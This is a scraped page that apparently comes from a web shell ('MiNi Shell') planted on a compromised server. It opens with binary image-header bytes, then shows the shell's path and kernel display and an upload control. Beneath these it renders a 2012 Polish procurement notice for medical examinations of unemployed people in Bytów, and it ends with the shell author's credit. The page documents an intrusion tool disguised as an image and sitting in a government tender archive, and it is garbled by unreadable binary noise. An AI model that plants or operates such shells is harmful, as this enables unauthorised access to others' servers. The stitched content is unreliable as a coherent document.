JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/253627-N-2012.html

<p class="kh_header"><b>Bytów: Badania lekarskie osób bezrobotnych i poszukujących pracy</b><br>
<b>Numer ogłoszenia: 253627 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bytowie , ul. Wojska Polskiego 6, 77-100 Bytów, woj. pomorskie, tel. 59 822-22-27, faks 59 823-41-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bytow.pup.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Badania lekarskie osób bezrobotnych i poszukujących pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objętym niniejszym postępowaniem jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług medycznych polegających na wykonaniu badań lekarskich osób bezrobotnych i poszukujących pracy. Zamawiający podzielił zamówienie na dwie części: 
CZĘŚĆ I  - badania lekarskie osób bezrobotnych i poszukujących pracy wykonywanych w Bytowie 
CZĘŚĆ II - badania lekarskie osób bezrobotnych i poszukujących pracy wykonywanych w Miastku. 
Wykonawca może złożyć ofertę na jedną część zamówienia lub na dwie części zamówienia.
CZĘŚĆ I zamówienia
Przedmiotem zamówienia objętym niniejszym postępowaniem jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług medycznych polegających na wykonaniu badań lekarskich ( wspólny słownik zamówień - 88.12.11.00- 4 ogólne usługi lekarskie)obejmujących:
Badania profilaktyczne (wstępne, okresowe, kontrolne) - 500 osób
Badania okulistyczne (w tym komputerowe badanie wzroku) - 90 osób
Badania diagnostyczne: EKG -10 osób, RTG klatki piersiowej - 80 osób ,RTG kończyn górnych - 15 osób, RTG kończyn dolnych - 15 osób,
Badania laboratoryjne: morfologia - 500 osób, OB -260 osób, mocz -500 osób, glukoza - 170 osób, cholesterol -130 osób, ASPAT -50 osób, ALAT -50 osób,
Badania neurologiczne - 45 osób
Badania laryngologiczne - 300 osób
Badania audiometryczne -10 osób
Badania spirometryczne - 10 osób
Badanie kału - 100 osób
Badania sanitarno-epidemiologiczne - 130 osób
Badania ogólne kierowcy - 100 osób
Badania psychotechniczne - 100 osób
Czucie wibracji - 15 osób.
Badaniami lekarskimi objęte zostaną osoby bezrobotne i poszukujące pracy w celu stwierdzenia zdolności do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym, odbywania stażu, wykonywania prac społecznie użytecznych oraz określenia szczególnych predyspozycji psychofizycznych wymaganych do wykonywania zawodu. CZĘŚĆ II zamówienia
Przedmiotem zamówienia objętym niniejszym postępowaniem jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług medycznych polegających na wykonaniu badań lekarskich ( wspólny słownik zamówień - 88.12.11.00- 4 ogólne usługi lekarskie) obejmujących:
Badania profilaktyczne (wstępne, okresowe, kontrolne) -130 osób
Badania okulistyczne (w tym komputerowe badanie wzroku) - 30 osób
Badania diagnostyczne: EKG - 20 osób, RTG klatki piersiowej - 20 osób, RTG kończyn górnych - 15 osób, RTG kończyn dolnych - 15 osób
Badania laboratoryjne: morfologia - 130 osób, OB - 20 osób, mocz - 130 osób, glukoza - 30 osób, cholesterol - 10 osób, ASPAT - 10 osób, ALAT - 10 osób
Badania neurologiczne - 20 osób
Badania laryngologiczne - 20 osób
Badania audiometryczne - 50 osób
Badania spirometryczne - 10 osób
Badanie kału - 30 osób
Badania sanitarno-epidemiologiczne - 50 osób
Badania ogólne kierowcy - 20 osób
Badania psychotechniczne - 20 osób
Czucie wibracji - 10 osób.
Badaniami lekarskimi objęte zostaną osoby bezrobotne i poszukujące pracy w celu stwierdzenia zdolności do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym, odbywania stażu, wykonywania prac społecznie użytecznych oraz określenia szczególnych predyspozycji psychofizycznych wymaganych do wykonywania zawodu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówienia będą badania lekarskie określone w rozdziale II.1.3. Zamawiający dopuszcza udzielenie zamówień uzupełniających stanowiących nie więcej niż 20 %  wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 88.12.11.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże,iż posiada aktualny wpis do rejestru Podmiotów Wykonujących Działalność Leczniczą prowadzonego przez wojewodę właściwego dla siedziby albo miejsca zamieszkania podmiotu leczniczego zgodnie z wymogami Ustawy z dnia 15 kwietnia 2011r. o działalności leczniczej ( t.j. Dz. U. z 2011r. nr 112, poz. 654 z późn.zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie zastrzega szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie zastrzega szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie zastrzega szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie zastrzega szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu spełnienia warunku:oświadczenie o posiadaniu aktualnego wpisu do rejestru Podmiotów Wykonujących Działalność Leczniczą prowadzonego przez wojewodę właściwego dla siedziby albo miejsca zamieszkania podmiotu leczniczego, formularz oferty, formularz cenowy -załącznik 1a , 1b do SIWZ, w zależności na którą część Wykonawca składa ofertę, pełnomocnictwo (oryginał lub jego kopia potwierdzona notarialnie) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia    i zawarcia umowy w sprawie zamówienia publicznego w przypadku, kiedy  w postępowaniu uczestniczy/ą osoba/y inna/e niż uprawnione do reprezentacji Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę miejsca wykonywania badań lekarskich, przy czym nowe miejsce musi znajdować się w granicach administracyjnych Bytowa lub Miastka, w zależności od części zamówienia. W przypadku zmiany adresu placówki bądź miejsca przeprowadzenia badań, Wykonawca ma obowiązek powiadomić o tym fakcie pisemnie Zamawiającego niezwłocznie, lecz nie później niż w terminie 5 dni przed zmianą adresu. Nowa siedziba lub placówka, w których będą wykonywane badania musi spełniać wymogi określone w Rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012r. w sprawie szczegółowych wymagań, jakie powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą( Dz. U. z 2012 r. poz. 739). Zamawiający przewiduje możliwość zmiany postanowień umowy,  w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa  w zakresie mającym wpływ na realizację przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bytow.pup.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Bytowie, ul. Wojska Polskiego 6, 77-100 Bytów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 13:00, miejsce: Powiatowy Urząd Pracy w Bytowie, ul. Wojska Polskiego 6, 77-100 Bytów (pokój nr 13).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne będzie finansowane ze środków Funduszu Pracy oraz współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny  Kapitał Ludzki  2007-2013,  Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej  w regionie, Poddziałanie  6.1.1 Wspieranie osób pozostających bez zatrudnienia na regionalnym rynku pracy. Tytuł projektu Aktywny 50-latek.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objętym niniejszym postępowaniem jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług medycznych polegających na wykonaniu badań lekarskich w Bytowie( wspólny słownik zamówień - 88.12.11.00- 4 ogólne usługi lekarskie)obejmujących:
Badania profilaktyczne (wstępne, okresowe, kontrolne) - 500 osób
Badania okulistyczne (w tym komputerowe badanie wzroku) - 90 osób
Badania diagnostyczne: EKG -10 osób, RTG klatki piersiowej - 80 osób ,RTG kończyn górnych - 15 osób, RTG kończyn dolnych - 15 osób,
Badania laboratoryjne: morfologia - 500 osób, OB -260 osób, mocz -500 osób, glukoza - 170 osób, cholesterol -130 osób, ASPAT -50 osób, ALAT -50 osób,
Badania neurologiczne - 45 osób
Badania laryngologiczne - 300 osób
Badania audiometryczne -10 osób
Badania spirometryczne - 10 osób
Badanie kału - 100 osób
Badania sanitarno-epidemiologiczne - 130 osób
Badania ogólne kierowcy - 100 osób
Badania psychotechniczne - 100 osób
Czucie wibracji - 15 osób.
Badaniami lekarskimi objęte zostaną osoby bezrobotne i poszukujące pracy w celu stwierdzenia zdolności do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym, odbywania stażu, wykonywania prac społecznie użytecznych oraz określenia szczególnych predyspozycji psychofizycznych wymaganych do wykonywania zawodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 88.12.11.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objętym niniejszym postępowaniem jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług medycznych polegających na wykonaniu badań lekarskich w Miastku( wspólny słownik zamówień - 88.12.11.00- 4 ogólne usługi lekarskie) obejmujących:
Badania profilaktyczne (wstępne, okresowe, kontrolne) -130 osób
Badania okulistyczne (w tym komputerowe badanie wzroku) - 30 osób
Badania diagnostyczne: EKG - 20 osób, RTG klatki piersiowej - 20 osób, RTG kończyn górnych - 15 osób, RTG kończyn dolnych - 15 osób
Badania laboratoryjne: morfologia - 130 osób, OB - 20 osób, mocz - 130 osób, glukoza - 30 osób, cholesterol - 10 osób, ASPAT - 10 osób, ALAT - 10 osób
Badania neurologiczne - 20 osób
Badania laryngologiczne - 20 osób
Badania audiometryczne - 50 osób
Badania spirometryczne - 10 osób
Badanie kału - 30 osób
Badania sanitarno-epidemiologiczne - 50 osób
Badania ogólne kierowcy - 20 osób
Badania psychotechniczne - 20 osób
Czucie wibracji - 10 osób.
Badaniami lekarskimi objęte zostaną osoby bezrobotne i poszukujące pracy w celu stwierdzenia zdolności do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym, odbywania stażu, wykonywania prac społecznie użytecznych oraz określenia szczególnych predyspozycji psychofizycznych wymaganych do wykonywania zawodu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 88.12.11.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com